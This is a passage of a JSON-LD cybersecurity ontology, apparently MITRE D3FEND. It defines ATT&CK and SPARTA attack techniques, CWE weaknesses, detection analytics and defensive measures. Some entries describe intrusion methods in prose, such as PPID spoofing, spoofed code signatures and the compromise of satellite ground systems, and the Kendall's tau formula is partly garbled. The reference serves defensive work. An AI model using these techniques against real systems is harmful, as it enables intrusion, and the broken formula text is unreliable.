      "d3f:kb-abstract": "Once a credential dumper like mimikatz runs, every user logged on since boot is potentially compromised, because the credentials were accessed via the memory of lsass.exe. When such an event occurs, this analytic will give the forensic context to identify compromised users. Those users could potentially be used in later events for additional logons.\n\nThe time field indicates the first and last time a system reported a user logged into a given system. This means that activity could be intermittent between the times given and should not be considered a duration.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:CredentialCompromiseScopeAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2015-07-001: All Logins Since Last Boot",
      "rdfs:label": "Reference - CAR-2015-07-001: All Logins Since Last Boot - MITRE"
    },
    {
      "@id": "d3f:T1406",
      "@type": "owl:Class",
      "d3f:attack-id": "T1406",
      "d3f:definition": "Adversaries may attempt to make a payload or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the device or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.",
      "rdfs:label": "Obfuscated Files or Information - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Obfuscated Files or Information"
    },
    {
      "@id": "d3f:owns",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x owns y: The subject x has ownership or possession of some object y.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/02209474-v"
      },
      "rdfs:label": "owns",
      "rdfs:seeAlso": {
        "@id": "dbr:Ownership"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      },
      "skos:altLabel": "possesses"
    },
    {
      "@id": "d3f:CCI-001495_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system protects audit tools from unauthorized deletion.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:PlatformHardening"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-29T00:00:00"
      },
      "rdfs:label": "CCI-001495"
    },
    {
      "@id": "d3f:NetworkPacket",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A network packet is a formatted unit of data carried by a packet-switched network. Computer communications links that do not support packets, such as traditional point-to-point telecommunications links, simply transmit data as a bit stream. When data is formatted into packets, packet switching is possible and the bandwidth of the communication medium can be better shared among users than with circuit switching.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Network_packet"
      },
      "rdfs:label": "Network Packet",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:Reference-ServicesLaunchingCmd_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": ""
      },
      "d3f:kb-abstract": "Windows runs the Service Control Manager (SCM) within the process services.exe. Windows launches services as independent processes or DLL loads within a svchost.exe group. To be a legitimate service, a process (or DLL) must have the appropriate service entry point SvcMain. If an application does not have the entry point, then it will timeout (default is 30 seconds) and the process will be killed.\n\nTo survive the timeout, adversaries and red teams can create services that direct to cmd.exe with the flag /c, followed by the desired command. The /c flag causes the command shell to run a command and immediately exit. As a result, the desired program will remain running and it will report an error starting the service. This analytic will catch that command prompt instance that is used to launch the actual malicious executable. Additionally, the children and descendants of services.exe will run as a SYSTEM user by default. Thus, services are a convenient way for an adversary to gain Persistence and Privilege Escalation.",
      "d3f:kb-author": "",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessLineageAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2014-05-002: Services launching Cmd",
      "rdfs:label": "Reference - CAR-2014-05-002: Services launching Cmd - MITRE"
    },
    {
      "@id": "d3f:T1134.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1134.004",
      "d3f:definition": "Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the <code>CreateProcess</code> API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via <code>svchost.exe</code> or <code>consent.exe</code>) rather than the current user context.(Citation: Microsoft UAC Nov 2018)",
      "d3f:invokes": {
        "@id": "d3f:CreateProcess"
      },
      "rdfs:label": "Parent PID Spoofing",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1134"
        },
        {
          "@id": "_:Nfb8f05303018433197c4bc2755fe90c0"
        }
      ]
    },
    {
      "@id": "_:Nfb8f05303018433197c4bc2755fe90c0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:HardwareDeviceDisconnectionEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the removal of a device from a system, ceasing its operational functionality or availability.",
      "rdfs:label": "Hardware Device Disconnection Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDeviceStateEvent"
        },
        {
          "@id": "_:Nbff8c1db4e18444fbc78f66a9820c51f"
        }
      ]
    },
    {
      "@id": "_:Nbff8c1db4e18444fbc78f66a9820c51f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDeviceConnectionEvent"
      }
    },
    {
      "@id": "d3f:CWE-228",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-228",
      "d3f:definition": "The product does not handle or incorrectly handles input that is not syntactically well-formed with respect to the associated specification.",
      "rdfs:label": "Improper Handling of Syntactically Invalid Structure",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-703"
        },
        {
          "@id": "d3f:CWE-707"
        }
      ]
    },
    {
      "@id": "d3f:CWE-790",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-790",
      "d3f:definition": "The product receives data from an upstream component, but does not filter or incorrectly filters special elements before sending it to a downstream component.",
      "rdfs:label": "Improper Filtering of Special Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:T1446",
      "@type": "owl:Class",
      "d3f:attack-id": "T1446",
      "d3f:definition": "An adversary may seek to lock the legitimate user out of the device, for example to inhibit user interaction or to obtain a ransom payment.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1629.002",
      "rdfs:label": "Device Lockout - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1629.002"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileImpactTechnique"
        }
      ],
      "skos:prefLabel": "Device Lockout"
    },
    {
      "@id": "d3f:RD-0005.04",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0005.04",
      "d3f:definition": "Electronic ASAT attacks target the communications lifelines of space systems rather than their structures: jamming raises the noise floor to deny service; spoofing crafts believable but false signals (navigation, timing, or control). These effects are usually transient and can be difficult to attribute quickly, yet they are operationally useful and comparatively inexpensive. Actors may obtain portable or fixed jammers, high-gain antennas with agile waveforms, and specialized signal-processing toolchains; from orbit, a nearby asset can deliver highly selective interference.",
      "rdfs:label": "Electronic ASAT - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0005/04/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RD-0005"
      },
      "skos:prefLabel": "Electronic ASAT"
    },
    {
      "@id": "d3f:T1117",
      "@type": "owl:Class",
      "d3f:attack-id": "T1117",
      "d3f:definition": "Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries. (Citation: Microsoft Regsvr32)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1218.010",
      "rdfs:label": "Regsvr32",
      "rdfs:seeAlso": {
        "@id": "d3f:T1218.010"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ExecutionTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1260",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1260",
      "d3f:definition": "The product allows address regions to overlap, which can result in the bypassing of intended memory protection.",
      "rdfs:label": "Improper Handling of Overlap Between Protected Memory Ranges",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:KendallsRankCorrelationCoefficient",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-KRCC",
      "d3f:definition": "Kendall's $\\\\tau$ between and is given by $(n_c - n_d) / \\\\sqrt((n_c+n_d+n_x)(n_c+n_d+n_y)$, where is the number of concordant pairs of observations, is the number of discordant pairs, is the number of ties involving only the variable, and is the number of ties involving only the variable.\" ;",
      "d3f:kb-article": "## References\n1. Wolfram Research. (2012). KendallTau. Wolfram Language function.  [Link](https://reference.wolfram.com/language/ref/KendallTau.html)\n1. Kendall's Tau. (2023, May 23). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Kendall_rank_correlation_coefficient]\"\"\",",
      "d3f:synonym": "Kendall's Tau Coefficient",
      "rdfs:isDefinedBy": {
        "@id": "https://reference.wolfram.com/language/ref/KendallTau.html"
      },
      "rdfs:label": "Kendall's Rank Correlation Coefficient",
      "rdfs:subClassOf": {
        "@id": "d3f:RankCorrelationCoefficient"
      }
    },
    {
      "@id": "d3f:Model",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DefensiveTactic"
      ],
      "d3f:definition": "The model tactic is used to apply security engineering, vulnerability, threat, and risk analyses to digital systems. This is accomplished by creating and maintaining a common understanding of the systems being defended, the operations on those systems, actors using the systems, and the relationships and interactions between these elements.",
      "d3f:display-order": -1,
      "d3f:display-priority": 1,
      "rdfs:label": "Model",
      "rdfs:subClassOf": {
        "@id": "d3f:DefensiveTactic"
      }
    },
    {
      "@id": "d3f:CWE-656",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-656",
      "d3f:definition": "The product uses a protection mechanism whose strength depends heavily on its obscurity, such that knowledge of its algorithms or key data is sufficient to defeat the mechanism.",
      "d3f:synonym": "Never Assuming your secrets are safe",
      "rdfs:label": "Reliance on Security Through Obscurity",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-657"
        },
        {
          "@id": "d3f:CWE-693"
        }
      ]
    },
    {
      "@id": "d3f:T1591.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1591.004",
      "d3f:definition": "Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.",
      "rdfs:label": "Identify Roles",
      "rdfs:subClassOf": {
        "@id": "d3f:T1591"
      }
    },
    {
      "@id": "d3f:SystemVulnerabilityAssessment",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SystemVulnerabilityAssessment"
      ],
      "d3f:d3fend-id": "D3-SYSVA",
      "d3f:definition": "System vulnerability assessment relates all the vulnerabilities of a system's components in the context of their configuration and internal dependencies and can also include assessing risk emerging from the system's design as a whole, not just the sum of individual component vulnerabilities.",
      "d3f:evaluates": {
        "@id": "d3f:DigitalSystem"
      },
      "d3f:identifies": {
        "@id": "d3f:Vulnerability"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SoftwareVulnerabilityGraphDatabase"
      },
      "rdfs:label": "System Vulnerability Assessment",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemMapping"
        },
        {
          "@id": "_:Nf7e4311bdc93455182443c4224714b7e"
        },
        {
          "@id": "_:N058046607d5c4b1d8b696f972d3497ff"
        }
      ]
    },
    {
      "@id": "_:Nf7e4311bdc93455182443c4224714b7e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:evaluates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalSystem"
      }
    },
    {
      "@id": "_:N058046607d5c4b1d8b696f972d3497ff",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:identifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Vulnerability"
      }
    },
    {
      "@id": "d3f:ATLASImpactTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0011"
      },
      "rdfs:label": "Impact Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:N9fe2b53e1ee940ed89ee6387b0012685"
        }
      ],
      "skos:prefLabel": "Impact Technique"
    },
    {
      "@id": "_:N9fe2b53e1ee940ed89ee6387b0012685",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0011"
      }
    },
    {
      "@id": "d3f:CWE-78",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-78",
      "d3f:definition": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.",
      "d3f:may-be-weakness-of": [
        {
          "@id": "d3f:EvalFunction"
        },
        {
          "@id": "d3f:ProcessStartFunction"
        },
        {
          "@id": "d3f:UserInputFunction"
        }
      ],
      "d3f:synonym": [
        "OS Command Injection",
        "Shell injection",
        "Shell metacharacters"
      ],
      "rdfs:label": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-77"
        },
        {
          "@id": "_:N645b1c7a388646c68c5607fd330f335a"
        },
        {
          "@id": "_:Ndcb6cc6106cb4829a5fc4f05dd75bdf3"
        },
        {
          "@id": "_:Nae39756f5a6f4875a9ec80f7c09126c7"
        }
      ]
    },
    {
      "@id": "_:N645b1c7a388646c68c5607fd330f335a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-be-weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EvalFunction"
      }
    },
    {
      "@id": "_:Ndcb6cc6106cb4829a5fc4f05dd75bdf3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-be-weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessStartFunction"
      }
    },
    {
      "@id": "_:Nae39756f5a6f4875a9ec80f7c09126c7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-be-weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInputFunction"
      }
    },
    {
      "@id": "d3f:IA-0007",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0007",
      "d3f:definition": "Compromising the ground segment gives an adversary the most direct path to first execution against a spacecraft. Ground systems encompass operator workstations and mission control software, scheduling/orchestration services, front-end processors and modems, antenna control, key-loading tools and HSMs, data gateways (SLE/CSP), identity providers, and cloud-hosted mission services. Once inside, a threat actor can prepare on-orbit updates, craft and queue valid telecommands, replay captured traffic within acceptance windows, or manipulate authentication material and counters to pass checks. The same foothold enables deep reconnaissance: enumerating mission networks and enclaves, discovering which satellites are operated from a site, mapping logical topology between MOC and stations, identifying in-band “birds” reachable from a given aperture, and learning pass plans, dictionaries, and automation hooks. From there, initial access to the spacecraft is a matter of timing and presentation, injecting commands, procedures, or update packages that align with expected operations so the first execution event appears indistinguishable from normal activity.",
      "rdfs:label": "Compromise Ground System - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0007/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAInitialAccessTechnique"
      },
      "skos:prefLabel": "Compromise Ground System"
    },
    {
      "@id": "d3f:PrincipalComponentAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PCA",
      "d3f:definition": "Principal components analysis (PCA) creates a new set of orthogonal variables that contain the same information as the original set. It rotates the axes of variation to give a new set of orthogonal axes, ordered so that they summarize decreasing proportions of the variation.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Multivariate statistics. [Link](https://en.wikipedia.org/wiki/Multivariate_statistics)",
      "d3f:synonym": "PCA",
      "rdfs:label": "Principal Component Analysis",
      "rdfs:subClassOf": {
        "@id": "d3f:MultivariateAnalysis"
      }
    },
    {
      "@id": "d3f:Reference-AutomaticallyGeneratingRulesForConnectionSecurity_Microsoft",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20120054825"
      },
      "d3f:kb-abstract": "A method and system for creating security policies for firewall and connection policies in an integrated manner is provided. The security system provides a user interface through which a user can define a security rule that specifies both a firewall policy and a connection policy. After the security rule is specified, the security system automatically generates a firewall rule and a connection rule to implement the security rule. The security system provides the firewall rule to a firewall engine that is responsible for enforcing the firewall rules and provides the connection rule to an IPsec engine that is responsible for enforcing the connection rules",
      "d3f:kb-author": "Charles D. Bassett; Eran Yariv; Ian M. Carbaugh; Lokesh Srinivas Koppolu; Maksim Noy; Sarah A. Wahlert; Pradeep Bahl",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Microsoft",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:kb-reference-title": "Automatically generating rules for connection security",
      "rdfs:label": "Reference - Automatically generating rules for connection security - Microsoft"
    },
    {
      "@id": "d3f:T1036.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1036.001",
      "d3f:creates": {
        "@id": "d3f:ExecutableBinary"
      },
      "d3f:definition": "Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)",
      "rdfs:label": "Invalid Code Signature",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1036"
        },
        {
          "@id": "_:Nbaea75140c064f21beaca47a130f1310"
        }
      ]
    },
    {
      "@id": "_:Nbaea75140c064f21beaca47a130f1310",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableBinary"
      }
    },
    {
      "@id": "d3f:CWE-586",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-586",
      "d3f:definition": "The product makes an explicit call to the finalize() method from outside the finalizer.",
      "rdfs:label": "Explicit Call to Finalize()",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1076"
      }
    },
    {
      "@id": "d3f:AgentGroup",
      "@type": "owl:Class",
      "rdfs:label": "Agent Group",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Group"
        },
        {
          "@id": "_:Neb45e16bbf10494186bbb23ee1c5c780"
        }
      ]
    },
    {
      "@id": "_:Neb45e16bbf10494186bbb23ee1c5c780",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Agent"
      }
    },
    {
      "@id": "d3f:DeleteFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Remove a file from a machine.",
      "d3f:deletes": {
        "@id": "d3f:File"
      },
      "rdfs:label": "Delete File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N9492eb2912be4326829db578150dca19"
        }
      ]
    },
    {
      "@id": "_:N9492eb2912be4326829db578150dca19",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:deletes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:CWE-85",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-85",
      "d3f:definition": "The web application does not filter user-controlled input for executable script disguised using doubling of the involved characters.",
      "rdfs:label": "Doubled Character XSS Manipulations",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-79"
      }
    },
    {
      "@id": "d3f:T1017",
      "@type": "owl:Class",
      "d3f:attack-id": "T1017",
      "d3f:definition": "Adversaries may deploy malicious software to systems within a network using application deployment systems employed by enterprise administrators. The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the deployment server, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform software deployment.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1072",
      "rdfs:label": "Application Deployment Software",
      "rdfs:seeAlso": {
        "@id": "d3f:T1072"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:LateralMovementTechnique"
      }
    },
    {
      "@id": "d3f:WirelessAccessPoint",
      "@type": "owl:Class",
      "d3f:definition": "In computer networking, a wireless access point (WAP), or more generally just access point (AP), is a networking hardware device that allows other Wi-Fi devices to connect to a wired network. The AP usually connects to a router (via a wired network) as a standalone device, but it can also be an integral component of the router itself. An AP is differentiated from a hotspot which is a physical location where Wi-Fi access is available.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Wireless_access_point"
      },
      "rdfs:label": "Wireless Access Point",
      "rdfs:subClassOf": {
        "@id": "d3f:ComputerNetworkNode"
      },
      "skos:altLabel": "WAP"
    },
    {
      "@id": "d3f:OperationalEvent",
      "@type": "owl:Class",
      "d3f:definition": "An Operational Event is an action or occurrence within an organization's mission or business operations that happens over a period of time.",
      "d3f:synonym": [
        "Business Event",
        "Business Process",
        "Mission Event",
        "Operational Activity Event",
        "Operational Occurrence"
      ],
      "rdfs:label": "Operational Event",
      "rdfs:seeAlso": [
        {
          "@id": "https://en.wikipedia.org/wiki/Unified_Architecture_Framework"
        },
        {
          "@id": "https://en.wikipedia.org/wiki/Event_(BPMN)"
        },
        {
          "@id": "https://www.omg.org/spec/UAF/"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:Action"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2020-11-004%3AProcessesStartedFromIrregularParent_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-11-004/"
      },
      "d3f:kb-abstract": "Adversaries may start legitimate processes and then use their memory space to run malicious code. This analytic looks for common Windows processes that have been abused this way in the past; when the processes are started for this purpose they may not have the standard parent that we would expect. This list is not exhaustive, and it is possible for cyber actors to avoid this discrepancy. These signatures only work if Sysmon reports the parent process, which may not always be the case if the parent dies before Sysmon processes the event.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessLineageAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-11-004: Processes Started From Irregular Parent",
      "rdfs:label": "Reference - CAR-2020-11-004: Processes Started From Irregular Parent - MITRE"
    },
    {
      "@id": "d3f:Reference-SoftwareVulnerabilityGraphDatabase",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/WO2020028535A1"
      },
      "d3f:kb-abstract": "To analyze open-source code at a large scale, a security domain graph language (\"SGL\") has been created that functions as a vulnerability description language and facilitates program analysis queries. The SGL facilitates building and maintaining a graph database to catalogue vulnerabilities found in open-source components. This graphical database can be accessed via a database interface directly or accessed by an agent that interacts with the database interface. To build the graph database, a database interface processes an open-source component and creates graph structures which represent relationships present in the open-source component. The database interface transforms a vulnerability description into a canonical form based on a schema for the graph database and updates the database based on a determination of whether the vulnerability is a duplicate. This ensures quality and consistency of the vulnerability dataset maintained in the graph database.",
      "d3f:kb-author": "Darius Tsien Wei FOO, Ming Yi ANG, Asankhaya Sharma, Jie Shun YEO",
      "d3f:kb-organization": "Veracode, Inc.",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:AssetVulnerabilityEnumeration"
        },
        {
          "@id": "d3f:SystemDependencyMapping"
        },
        {
          "@id": "d3f:SystemVulnerabilityAssessment"
        }
      ],
      "d3f:kb-reference-title": "Software vulnerability graph database",
      "rdfs:label": "Reference - Software vulnerability graph database"
    },
    {
      "@id": "d3f:ForwardResolutionIPDenylisting",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ForwardResolutionIPDenylisting"
      ],
      "d3f:blocks": {
        "@id": "d3f:InboundInternetDNSResponseTraffic"
      },
      "d3f:d3fend-id": "D3-FRIDL",
      "d3f:definition": "Blocking a DNS lookup's answer's IP address value.",
      "d3f:kb-article": "## How it works\n\nThis technique prevents a client from learning IP addresses deemed to be potentially malicious, which would have been delivered via forward resolution responses.\n\nResponses to forward resolution requests (that is, requests where a domain is sent and IP(s) are returned) are collected, and the IP address(es) included as a response are examined. If the IP address(es) are in a range included in the blacklist, then the response is dropped and not forwarded to the client.\n\nThe DNS lookup can be blocked by either dropping the network traffic with an inline device, or modifying the value of the response sent by the DNS server. To transparently prevent client applications from hanging on a request, it is common practice to replace malicious values with addresses in the range 127.0.0.0/8 or the address of a honeypot maintained by the network administrators.\n\n## Considerations\n\n* This technique does not prevent the client from contacting the blacklisted IP, only from learning about this IP address via a nameserver lookup request.\n* DNS Response traffic can be transmitted over many different protocols, which presents a challenge to implementing methods to extract all DNS answer IP address value(s).\n  * DNS has historically used UDP port 53, with TCP port 53 instead used for responses over 512 bytes or after a lack of response over UDP.\n  * Usage of new protocols to provide confidentiality for DNS traffic, such as DoH (DNS over HTTPS) and DoT (DNS over TLS), complicates collection of the IP address(es) in DNS responses. These protocols have often been enabled in browser settings transparently after a browser update, with DNS requests proxied over one of these cryptographic protocols through a specified host.\n* This technique must be implemented logically between the application that receives the response and the server which sent the response.\n  * DNS responses sent in an encrypted manner, such as those using DoH or DoT, will require interception of the TLS connections in order to determine the IP address(es) in the response.\n* Replacing the response is not effective in the case that the nameserver uses a technique to provide integrity of its responses, such as DNSSEC for DNS responses.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-UseDNSPolicyForApplyingFiltersOnDNSQueries"
      },
      "d3f:synonym": "Forward Resolution IP Blacklisting",
      "rdfs:label": "Forward Resolution IP Denylisting",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DNSDenylisting"
        },
        {
          "@id": "_:Nc1b30040d8f94153b58c122b7bd1a327"
        }
      ]
    },
    {
      "@id": "_:Nc1b30040d8f94153b58c122b7bd1a327",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:blocks"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InboundInternetDNSResponseTraffic"
      }
    },
    {
      "@id": "d3f:IA-0009.03",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0009.03",
      "d3f:definition": "The “user segment” encompasses end users and their equipment that interact with mission services, SATCOM terminals, customer ground gateways, tasking portals, and downstream processing pipelines for delivered data. Where these environments interconnect with mission cores, a compromised user domain becomes a springboard. Attackers can inject malformed tasking requests that propagate into payload scheduling, craft user-plane messages that traverse gateways into control or management planes, or seed data products that flow back to mission processing systems and automation. In broadband constellations and hosted services, user terminals may share infrastructure with TT&C or provider management networks, creating opportunities to pivot from customer equipment into provider-run nodes that the spacecraft trusts.",
      "rdfs:label": "User Segment - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0009/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0009"
      },
      "skos:prefLabel": "User Segment"
    },
    {
      "@id": "d3f:Application",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A program that gives a computer instructions that provide the user with tools to accomplish a task; \"he has tried several different word processing applications\".  Distinct from system software that is intrinsically part of the operating system.  An application can be made up of executable files, configuration files, shared libraries, etc.",
      "d3f:may-contain": {
        "@id": "d3f:ApplicationConfiguration"
      },
      "rdfs:label": "Application",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Application_software"
        },
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/06582286-n"
        },
        {
          "@id": "https://schema.ocsf.io/objects/application"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Software"
        },
        {
          "@id": "_:N0d7a60054d9049d8b68c0f3d3e5a9f14"
        }
      ]
    },
    {
      "@id": "_:N0d7a60054d9049d8b68c0f3d3e5a9f14",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationConfiguration"
      }
    },
    {
      "@id": "d3f:T1567.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1567.004",
